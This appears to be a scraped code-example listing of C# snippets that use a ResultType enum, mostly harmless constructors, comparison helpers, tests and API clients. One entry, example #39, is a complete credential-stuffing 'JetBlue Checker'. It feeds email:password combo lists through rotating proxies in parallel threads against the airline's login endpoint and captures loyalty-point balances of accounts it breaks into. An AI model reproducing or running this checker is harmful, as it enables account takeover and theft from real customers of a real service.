コード例 #1
0
ファイル: MemberResult.cs プロジェクト: TerabyteX/main
 internal MemberResult(string name, ResultType type)
 {
     _name = name;
     _type = type;
     _completion = _name;
     _vars = Empty;
 }
コード例 #2
0
ファイル: Statement.cs プロジェクト: mikeobrien/Gribble
 public Statement(string text, StatementType type, ResultType result, IDictionary<string, object> parameters)
 {
     Type = type;
     Text = text;
     Result = result;
     Parameters = parameters ?? new Dictionary<string, object>();
 }
コード例 #3
0
        /// <summary>
        /// The get html.
        /// </summary>
        /// <param name="id">
        /// The id.
        /// </param>
        /// <param name="type">
        /// The type.
        /// </param>
        public static void GetHtml(int id, ResultType type)
        {
            var wc = new WebClient();
            var url1 = Utils.GetWebSiteUrl;
            var url2 = url1;
            switch (type)
            {
                case ResultType.Product:
                    url1 += "/Product/item/" + id;
                    url2 += "/Product/item-id-" + id + ".htm";
                    break;
                case ResultType.Team:
                    url1 += "/Home/TuanItem/" + id;
                    url2 += "/Home/TuanItem/" + id + ".htm";
                    break;
                case ResultType.LP:
                    url1 += "/LandingPage/" + id;
                    url2 += "/LandingPage/" + id + ".htm";
                    break;
                case ResultType.Acticle:
                    url1 += "/Acticle/" + id;
                    url2 += "/Acticle/" + id + ".htm";
                    break;
                case ResultType.Help:
                    url1 += "/Help/" + id;
                    url2 += "/Help/" + id + ".htm";
                    break;
            }

            wc.DownloadString(url1);
            wc.DownloadString(url2);
        }
コード例 #4
0
ファイル: CommandResult.cs プロジェクト: gavioto/evimsync
 public CommandResult(string cmd, string[] args)
 {
     _results = new List<string>();
     _command = cmd;
     _args = args;
     _type = ResultType.Success;
 }
コード例 #5
0
ファイル: ResultInfo.cs プロジェクト: cmoussalli/DynThings
 internal Result(long resultID, ResultType resultType, string message, long reference)
 {
     ResultID = resultID;
     ResultType = resultType;
     Message = message;
     Reference = reference;
 }
コード例 #6
0
ファイル: ResultInfo.cs プロジェクト: cmoussalli/DynThings
        public static Result GetResultByID(long resultID, long referenceID)
        {
            ResultMessage msg = db.ResultMessages.Find(resultID);
            string msgTxt = "";
            ResultType rt = new ResultType();
            if (msg.IsError == false)
            { rt = ResultType.Ok; }
            else
            {
                if (Config.DevelopmentMode == true)
                {
                    rt = ResultType.Failed_DevelopmentMode;
                    msgTxt = msg.Message;
                }
                else
                {
                    rt = ResultType.Failed_ProductionMode;
                }
            }

            Result res = new Result(resultID, rt, msgTxt, referenceID);
            res = new Result(msg.ID, rt, msg.Message, 0);

            return res;
        }
コード例 #7
0
ファイル: ExecuteResult.cs プロジェクト: mind0n/hive
		public ExecuteResult(object rlt, Exception err = null)
		{
			Exception = err;
			if (rlt is IDataReader)
			{
				ReaderRlt = rlt as IDataReader;
				Type = ResultType.DataReader;
			}
			else if (rlt is int)
			{
				IntRlt = (int)rlt;
				Type = ResultType.Integer;
			}
			else
			{
				if (err == null)
				{
					ObjRlt = rlt;
					Type = ResultType.Object;
				}
				else
				{
					Exception = err;
					Type = ResultType.Error;
				}
			}
		}
コード例 #8
0
ファイル: TesterBase.cs プロジェクト: Orvid/Orvid.Assembler
		public TestResult(ResultType res, byte[] actualBytes, byte[] expectedBytes, string failureDetails = null)
		{
			Result = res;
			ActualBytes = actualBytes;
			ExpectedBytes = expectedBytes;
			FailureDetails = failureDetails;
		}
コード例 #9
0
 public async Task<IEnumerable<Message>> SearchAsync(
     IEnumerable<string> values, 
     ResultType resultType,
     int count)
 {
     return await SearchAsync(values, resultType, count, null);
 }
コード例 #10
0
		public void Reset ()
		{
			resultType = ResultType.NotRun;
			duration = 0f;
			messages = "";
			stacktrace = "";
			isRunning = false;
		}
コード例 #11
0
ファイル: SearchEntry.cs プロジェクト: khtutz/anet4jkhz
 public SearchEntry(int id, string name, ResultType restype, UserType usetype)
 {
     ID = id;
     Name = name;
     ResultType = restype;
     UserType = usetype;
     Hit = 1;
 }
コード例 #12
0
		public TestResult ( GameObject gameObject )
		{
			id =  Guid.NewGuid().ToString("N");
			resultType = ResultType.NotRun;
			this.go = gameObject;
			if(gameObject!=null)
				name = gameObject.name;
		}
コード例 #13
0
		IEnumerator PassAction (ResultType result)
		{
			yield return null; // No init

			Debug.Log (result);

			yield return result;
		}
コード例 #14
0
 public RawResult(RawResult[] arr)
 {
     if (arr == null) throw new ArgumentNullException("arr");
     this.resultType = ResultType.MultiBulk;
     this.offset = 0;
     this.count = arr.Length;
     this.arr = arr;
 }
コード例 #15
0
ファイル: SearchEngine.cs プロジェクト: vetterd/CSBuild
        public void Search(GlobPattern pattern, GlobPath curPath, List<GlobPath> result, ResultType resultType)
        {
            /*
            if (resultType == ResultType.Directory && pattern.IsOnLastPart)
            {
                //If the current directory matches the pattern, add this path to the result list
                if (pattern.MatchesCompletely(curPath))
                    result.Add(curPath.ToString());
            }*/

            if (resultType == ResultType.File && pattern.IsOnLastPart)
            {
                //Add all matching files to the result list
                foreach (var file in GetFiles(curPath))
                {
                    if (pattern.MatchesCurrentPart(file))
                        result.Add(curPath.AppendPart(file));
                }
            }

            if (pattern.Parts[pattern.CurrentIndex] == ".." || pattern.Parts[pattern.CurrentIndex] == ".")
            {
                Search(pattern.SwitchToNextPart(), curPath.AppendPart(pattern.Parts[pattern.CurrentIndex]), result, resultType);
                return;
            }
            
            //If the next pattern part is recursive wildcard
            //we get list of all sub folders and continue the normal search there.
            if (pattern.Parts[pattern.CurrentIndex] == "**")
            {
                foreach (var subDir in GetRecursiveSubDirectories(curPath))
                    Search(pattern.SwitchToNextPart(), subDir, result, resultType);
                return;
            }
            
            //Traverse all sub directories which should be traversed
            foreach (var directory in GetDirectories(curPath))
            {
                if (pattern.MatchesCurrentPart(directory))
                    if (pattern.IsOnLastPart && resultType == ResultType.Directory)
                    {
                        var newPath = curPath.AppendPart(directory);

                        //Only add this path to result list if there is no longer version of this path
                        result.RemoveAll(x =>
                        {
                            if (x.Parts.Length <= newPath.Parts.Length)
                                if (x.Parts.SequenceEqual(newPath.Parts.Take(x.Parts.Length)))
                                    return true;
                            return false;
                        });
                        result.Add(newPath);
                    }
                    else
                        if (!pattern.IsOnLastPart)
                            Search(pattern.SwitchToNextPart(), curPath.AppendPart(directory), result, resultType);
            }
        }
コード例 #16
0
ファイル: DistrictCodeTable.cs プロジェクト: ExDevilLee/LSLib
        /// <summary>通过两位地区码得到对应的地区名称
        /// </summary>
        /// <param name="code">两位地区码</param>
        /// <param name="resType">返回类型:Simple(简称)、Full(全称)</param>
        /// <returns>对应的地区名称</returns>
        public static string GetDistrictCode(string code, ResultType resType)
        {
            if (code.Length != 2) throw new ArgumentException("地区代码的长度应该等于2。");

            Hashtable districtTB = getNewDistrictTable(resType);

            if (!districtTB.ContainsKey(code)) throw new Exception("地区代码不存在!");
            return districtTB[code].ToString();
        }
コード例 #17
0
ファイル: Aggregates.cs プロジェクト: kamalm87/KNMFin
 private AggregateProperty( string d, string n, string v, ResultType type )
 {
     if ( All == null ) All = new HashSet<AggregateProperty>( );
     Description = d;
     Name = n;
     Value = v;
     Type = type;
     All.Add( this );
 }
        private static void AssertOperationResultValidationResultsMessageCodeOnPushNotificationSendResult(PushNotificationSendResult result, ResultType resultType, bool completelyValid, bool validWithWarnings, string code = null)
        {
            Assert.AreEqual(result.OperationResult, resultType);
            Assert.AreEqual(result.ValidationResults.IsCompletelyValid, completelyValid);
            Assert.AreEqual(result.ValidationResults.IsValidWithWarnings, validWithWarnings);

            if (!String.IsNullOrWhiteSpace(code))
            {
                Assert.IsTrue(result.ValidationResults.Any(vr => vr.MessageCode == code));
            }
        }
        private static void AssertOperationResultValidationResultsMessageCodeOnWindowsPhoneCallbackRegistrationResponse(WindowsPhoneCallbackRegistrationResponse response, ResultType resultType, bool completelyValid, bool validWithWarnings, string code = null)
        {
            Assert.AreEqual(response.OperationResult, resultType);
            Assert.AreEqual(response.ValidationResults.IsCompletelyValid, completelyValid);
            Assert.AreEqual(response.ValidationResults.IsValidWithWarnings, validWithWarnings);

            if (!String.IsNullOrWhiteSpace(code))
            {
                Assert.IsTrue(response.ValidationResults.Any(vr => vr.MessageCode == code));
            }
        }
コード例 #20
0
        public JsonMessage(
            ResultType messageStatus, string msg, object dataObject, string specialCode)
        {
            statusEnum = messageStatus;

            message = msg;

            data = dataObject;

            code = specialCode;
        }
コード例 #21
0
 public static async Task<IEnumerable<TwitterModel>> LoadTweets(string searchKey, ResultType resultType) {
     //Prepare the url
     string query = string.Format("http://search.twitter.com/search.json?q=%23{0}&result_type={1}", searchKey, resultType.ToString());
     var client = new HttpClient();
     //Make the request
     var httpResponse = await client.GetAsync(new Uri(query));
     //Read the response
     var responseContent = await httpResponse.Content.ReadAsStringAsync();
     // Parse the response (JSON)
     return ParseResponse(responseContent);
 }
コード例 #22
0
 private void CreateResult(ResultType resultType, DatabaseFunction function, string script)
 {
     var result = new CompareResult
         {
             SchemaObjectType = SchemaObjectType.Function,
             ResultType = resultType,
             Name = function.Name,
             SchemaOwner = function.SchemaOwner,
             Script = script
         };
     _results.Add(result);
 }
コード例 #23
0
ファイル: XmlReport.cs プロジェクト: andywhitfield/StatLight
 private static TestResultType GetTestResult(ResultType resultType)
 {
     switch (resultType)
     {
         case ResultType.Passed:
             return TestResultType.Passed;
         case ResultType.Ignored:
             return TestResultType.NotExecuted;
         default:
             return TestResultType.Failed;
     }
 }
コード例 #24
0
 private void CreateResult(ResultType resultType, DatabasePackage package, string script)
 {
     var result = new CompareResult
         {
             SchemaObjectType = SchemaObjectType.Package,
             ResultType = resultType,
             Name = package.Name,
             SchemaOwner = package.SchemaOwner,
             Script = script
         };
     _results.Add(result);
 }
コード例 #25
0
 private static string GetRowClass(ResultType type)
 {
     switch (type) {
         case ResultType.Success:
             return "success";
         case ResultType.Error:
             return "error";
         case ResultType.Failure:
             return "warning";
     }
     throw new ArgumentOutOfRangeException("type");
 }
コード例 #26
0
 private void CreateResult(ResultType resultType, DatabaseSequence sequence, string script)
 {
     var result = new CompareResult
         {
             SchemaObjectType = SchemaObjectType.Sequence,
             ResultType = resultType,
             Name = sequence.Name,
             SchemaOwner = sequence.SchemaOwner,
             Script = script
         };
     _results.Add(result);
 }
コード例 #27
0
 private void CreateResult(ResultType resultType, DatabaseView view, string script)
 {
     var result = new CompareResult
         {
             SchemaObjectType = SchemaObjectType.View,
             ResultType = resultType,
             Name = view.Name,
             SchemaOwner = view.SchemaOwner,
             Script = script
         };
     _results.Add(result);
 }
コード例 #28
0
 private void CreateResult(ResultType resultType, DatabaseStoredProcedure storedProcedure, string script)
 {
     var result = new CompareResult
         {
             SchemaObjectType = SchemaObjectType.StoredProcedure,
             ResultType = resultType,
             Name = storedProcedure.Name,
             SchemaOwner = storedProcedure.SchemaOwner,
             Script = script
         };
     _results.Add(result);
 }
コード例 #29
0
        /// <param name="resultType">Defines the type of the returned result</param>
        /// <param name="cancelToken">Timeout</param>
        /// <returns>Returns Raw string with the defined resultType</returns>
        public async Task<string> GetWeatherAsync(ResultType resultType = ResultType.Json,
      CancellationToken cancelToken = default(CancellationToken))
        {
            this.resultType = resultType;
            refreshQueryString();
            finalizeTheServiceQuery();
            using (HttpClient httpClient = new HttpClient())
            {
                var response = await httpClient.GetAsync(this.serviceUrlWithQuery, cancelToken);
                return (await response.Content.ReadAsStringAsync());
            }

        }
コード例 #30
0
 private void CreateResult(ResultType resultType, DatabaseTable table, string name, string script)
 {
     var result = new CompareResult
         {
             SchemaObjectType = SchemaObjectType.Trigger,
             ResultType = resultType,
             TableName = table.Name,
             SchemaOwner = table.SchemaOwner,
             Name = name,
             Script = script
         };
     _results.Add(result);
 }
コード例 #31
0
 public static SaveIdentityResult Create(Identity identity, ResultType type)
 {
     return(new SaveIdentityResult(identity, type));
 }
コード例 #32
0
ファイル: ResultList.cs プロジェクト: klypz/switchblade
 /// <summary>
 /// <para>Utilizado para retornar um objeto requisitado.</para>
 /// </summary>
 /// <param name="type">Tipo de resultado</param>
 /// <param name="data">Objeto da resposta</param>
 /// <param name="pageSize">Quantidade de registros por página</param>
 /// <param name="currentPage">Página atual</param>
 /// <param name="count">Quantidade total de registros na consulta</param>
 public ResultList(int pageSize, int currentPage, int count, ResultType type, List <T> data) : base(type, data)
 {
     Init(pageSize, currentPage, count);
 }
コード例 #33
0
ファイル: ApiClient.cs プロジェクト: yukinjie/lean-monitor
        public async Task <ResultContext> GetResultAsync(int projectId, string instanceId, ResultType type)
        {
            switch (type)
            {
            case ResultType.Backtest:
                return(await GetBacktestResult(projectId, instanceId));

            default:
                throw new NotSupportedException();
            }
        }
コード例 #34
0
 public CustomJsonResult(ResultType type, string code, string message, T content, params JsonConverter[] converters)
 {
     SetCustomJsonResult(null, type, code, message, content, null, converters);
 }
コード例 #35
0
 public AjaxResult(ResultType code, string message)
 {
     Code    = code;
     Message = message;
 }
コード例 #36
0
ファイル: ResultList.cs プロジェクト: klypz/switchblade
 /// <summary>
 /// <para>Utilizado para montar um objeto de retorno em tempo de execução.</para>
 /// </summary>
 /// <param name="type">Tipo de resultado</param>
 /// <param name="code">Um código definido para a resposta</param>
 /// <param name="pageSize">Quantidade de registros por página</param>
 /// <param name="currentPage">Página atual</param>
 /// <param name="count">Quantidade total de registros na consulta</param>
 public ResultList(int pageSize, int currentPage, int count, ResultType type, string code) : base(type, code)
 {
     Init(pageSize, currentPage, count);
 }
コード例 #37
0
 /// <summary>
 /// Reduces the set of data collected. The syntax allowed depends on the operation. See the operation's description for details. Possible values include: 'Data', 'Metadata'.
 /// </summary>
 /// <param name="resultType">The type of metric to retrieve.</param>
 /// <return>The stage of optional query parameter definition and query execution.</return>
 Microsoft.Azure.Management.Monitor.Fluent.IWithMetricsQueryExecute Microsoft.Azure.Management.Monitor.Fluent.IWithMetricsQueryExecute.WithResultType(ResultType resultType)
 {
     return(this.WithResultType(resultType) as Microsoft.Azure.Management.Monitor.Fluent.IWithMetricsQueryExecute);
 }
コード例 #38
0
        static async Task RunAsync()
        {
            try
            {
                IDisplayResult      displayResult  = null;
                FactoryDisplay      factoryDisplay = new FactoryDisplay();
                HttpResponseMessage response       = new HttpResponseMessage();
                string userChoice = "";

                do
                {
                    Console.WriteLine("1.All Products ");
                    Console.WriteLine("2.Products By CategoryId ");
                    Console.WriteLine("3.All Category ");
                    Console.WriteLine("\n");
                    Console.WriteLine("Please enter your choice either 1,2 or 3 ");

                    var userOption = Convert.ToInt32(Console.ReadLine());

                    ResultType resultType = (ResultType)Enum.ToObject(typeof(ResultType), userOption);

                    using (var client = new HttpClient())
                    {
                        client.BaseAddress = new Uri("https://localhost:44384/");
                        client.DefaultRequestHeaders.Accept.Clear();
                        client.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json"));

                        //Get DisplayResult(i.e.ShowAllProducts) object from factory class.
                        displayResult = factoryDisplay.GetDisplayResultType(resultType);

                        if (displayResult != null)
                        {
                            //Get response from api.
                            response = await displayResult.GetResponse(client);

                            //Display in console.
                            displayResult.Display(response);
                        }
                    }

                    do
                    {
                        Console.WriteLine("\n");
                        Console.WriteLine("Do you want to continue - yes or no?");
                        userChoice = Console.ReadLine();

                        if (userChoice != "yes" && userChoice != "no")
                        {
                            Console.WriteLine("Invalid choice, please say yes or no");
                        }
                    } while (userChoice != "yes" && userChoice != "no");
                } while (userChoice == "yes");
            }
            catch (UriFormatException ex)
            {
                Console.WriteLine("Your Web Api Url is incorrect:: {0}", ex.Message);
                Console.ReadLine();
            }
            catch (HttpRequestException ex)
            {
                Console.WriteLine("Check whether your Web Api is running or not:: {0}", ex.Message);
                Console.ReadLine();
            }
            catch (Exception ex)
            {
                Console.WriteLine("There is some error/exception:: {0}", ex.Message);
                Console.ReadLine();
            }
        }
コード例 #39
0
        static void Main(string[] args)
        {
            MilkyManager Milky = new MilkyManager();

            Milky.ProgramManager.Initialize("JetBlue Checker", "1.0.0", "Laiteux", "https://pastebin.com/raw/QW82zeqi");

            int threads = Milky.UserUtils.AskInteger("Threads");

            Milky.RunSettings.threads = threads;
            ThreadPool.SetMinThreads(threads, threads);

            Milky.RunSettings.proxyProtocol = Milky.UserUtils.AskChoice("Proxy Protocol", new string[] { "HTTP", "SOCKS4", "SOCKS5" });

            Milky.ConsoleSettings.runningTitleFormat =
                $"%program.name% %program.version% by %program.author% – Running | " +
                $"Ran : %run.ran% (%run.ran.percentage%) – Remaining : %run.remaining% – Hits : %run.hits% (%run.hits.percentage%) – Total Points : %custom.Total_Points% | " +
                $"RPM : %statistics.rpm% – Elapsed : %statistics.elapsed% – Estimated : %statistics.estimated%";
            Milky.ConsoleSettings.finishedTitleFormat =
                $"%program.name% %program.version% by %program.author% – Finished | " +
                $"Ran : %run.ran% – Hits : %run.hits% (%run.hits.percentage%) – Total Points : %custom.Total_Points% | " +
                $"Elapsed : %statistics.elapsed%";

            Milky.FileUtils.LoadCombos("Email:Password");
            Milky.FileUtils.LoadProxies(Milky.RunSettings.proxyProtocol);

            Milky.CustomStatistics.AddCustomStatistic("Total Points");

            Milky.RunManager.StartRun();

            Parallel.ForEach(Milky.RunLists.combos, new ParallelOptions {
                MaxDegreeOfParallelism = Milky.RunSettings.threads
            }, combo =>
            {
                string[] splittedCombo = combo.Split(':');

                ResultType resultType      = ResultType.Invalid;
                CaptureDictionary captures = new CaptureDictionary();

                if (splittedCombo.Length == 2)
                {
                    string login    = splittedCombo[0];
                    string password = splittedCombo[1];

                    while (resultType == ResultType.Invalid)
                    {
                        MilkyRequest request = Milky.RequestUtils.SetProxy(new MilkyRequest());

                        try
                        {
                            request.AddHeader("Content-Type", "application/json");

                            string response = Milky.RequestUtils.Execute(request,
                                                                         HttpMethod.POST, "https://jbrest.jetblue.com/iam/login/",
                                                                         "{\"id\":\"" + login + "\",\"pwd\":\"" + password + "\"}").ToString();
                            dynamic json = JsonConvert.DeserializeObject(response);

                            if (response.Contains("{\"points\""))
                            {
                                int points = int.Parse((string)json.points);
                                Milky.CustomStatistics.IncrementCustomStatistic("Total Points", points);
                                captures.Add("Points", points.ToString());

                                resultType = points == 0 ? ResultType.Free : ResultType.Hit;
                            }
                            else if (response.Contains("JB_INVALID_CREDENTIALS") || response.Contains("{\"name\"") || response.Contains("{\"httpStatus\":\"424\""))
                            {
                                break;
                            }
                        }
                        catch { }

                        request.Dispose();
                    }
                }

                Milky.RunManager.SubmitComboResult(combo, resultType, captures);
            });

            Milky.RunManager.FinishRun();

            Thread.Sleep(-1);
        }
コード例 #40
0
 private void btnReset_Click(object sender, EventArgs e)
 {
     Result = (cbDeleteNewFiles.Checked) ? ResultType.RESET_AND_DELETE : ResultType.RESET;
     Close();
 }
コード例 #41
0
ファイル: MvcAjaxResponse.cs プロジェクト: LambertW/Fogy
 public MvcAjaxResponse(ResultType state, string message, object data = null)
 {
     this.state   = state;
     this.message = message;
     this.data    = data;
 }
コード例 #42
0
 public ResultExpression(ResultType dataType, object data) : base(ExpressionType.Data)
 {
     DataType = dataType;
     Data     = data;
 }
コード例 #43
0
 /// <summary>
 /// Creates a new sign in HTTP response class instance
 /// </summary>
 public SignInHttpResponse(ResultType result, Version version = null, Token accessToken = null)
 {
     this.result      = (int)result;
     this.version     = version;
     this.accessToken = accessToken;
 }
コード例 #44
0
 public CustomJsonResult(string contenttype, ResultType type, string message, T content, JsonSerializerSettings settings, params JsonConverter[] converters)
 {
     SetCustomJsonResult(contenttype, type, "", message, content, settings, converters);
 }
コード例 #45
0
 public static SaveIdentityResult As(ResultType type)
 {
     return(new SaveIdentityResult(null, type));
 }
コード例 #46
0
 private void DataChangeListenResult(IntPtr handle, ResultType type, int callbackId, IntPtr userData)
 {
     OnDataChangeListenResult(new DataChangeListenResult(type));
 }
コード例 #47
0
 public ExpectedResult()
 {
     this.resultTypeField = ResultType.Success;
 }
コード例 #48
0
 public TableResultSet(int resultIndex, ColumnInfoCollection columns, ResultType type)
 {
     ResultIndex = resultIndex;
     Columns     = columns;
     Type        = type;
 }
コード例 #49
0
 private SaveIdentityResult(Identity identity, ResultType type)
 {
     Identity = identity;
     Type     = type;
 }
コード例 #50
0
ファイル: Result.cs プロジェクト: ar1st0crat/MusCat
 public Result(ResultType type, string error)
 {
     Type  = type;
     Error = error;
 }
コード例 #51
0
ファイル: ResultList.cs プロジェクト: klypz/switchblade
 /// <summary>
 /// <para>Utilizado para retornar uma exceção como resposta</para>
 /// </summary>
 /// <param name="type">Tipo de resultado</param>
 /// <param name="exception">Objeto de exceção</param>
 public ResultList(ResultType type, Exception exception) : base(type, exception)
 {
     Init(-1, -1, -1);
 }
コード例 #52
0
ファイル: Job.cs プロジェクト: zhxie/Ikas
 public Job(int number, DateTime startTime, double hazardLevel, ShiftStage stage, List <Wave> waves, JobPlayer myPlayer, List <JobPlayer> otherPlayers, List <SalmoniodCount> salmoniodAppearances, int score, int gradePointDelta, ResultType result)
 {
     Number               = number;
     StartTime            = startTime;
     HazardLevel          = hazardLevel;
     Stage                = stage;
     Waves                = waves;
     MyPlayer             = myPlayer;
     OtherPlayers         = otherPlayers;
     SalmoniodAppearances = salmoniodAppearances;
     Score                = score;
     GradePointDelta      = gradePointDelta;
     Result               = result;
 }
コード例 #53
0
 public static IGeocodingQuery WithResultType(this IGeocodingQuery query, ResultType resultType)
 {
     query.Params["result_type"] = Enum.GetName(typeof(ResultType), resultType);
     return(query);
 }
コード例 #54
0
 private IsTaskResult(ResultType resultType, ITypeSymbol typeSymbol = default)
 {
     this.resultType = resultType;
     this.typeSymbol = typeSymbol;
 }
コード例 #55
0
 public Result(string playerToken, ResultType type)
 {
     PlayerToken = playerToken;
     Type        = type;
 }
コード例 #56
0
        public object Convert(object value, Type targetType, object parameter, string language)
        {
            ResultType result = (ResultType)value;

            return(result != ResultType.Match ? Visibility.Visible : Visibility.Collapsed);
        }
コード例 #57
0
 public AttackResult()
 {
     resultType = ResultType.normal;
 }
コード例 #58
0
 internal PenProfileReceivedEventArgs(ResultType result)
 {
     Result = result;
 }
コード例 #59
0
 public CustomJsonResult(string contenttype, ResultType type, string message, T content, JsonSerializerSettings settings)
 {
     SetCustomJsonResult(contenttype, type, "", message, content, settings);
 }
コード例 #60
0
 private void btnCancel_Click(object sender, EventArgs e)
 {
     Result = ResultType.CANCEL;
     Close();
 }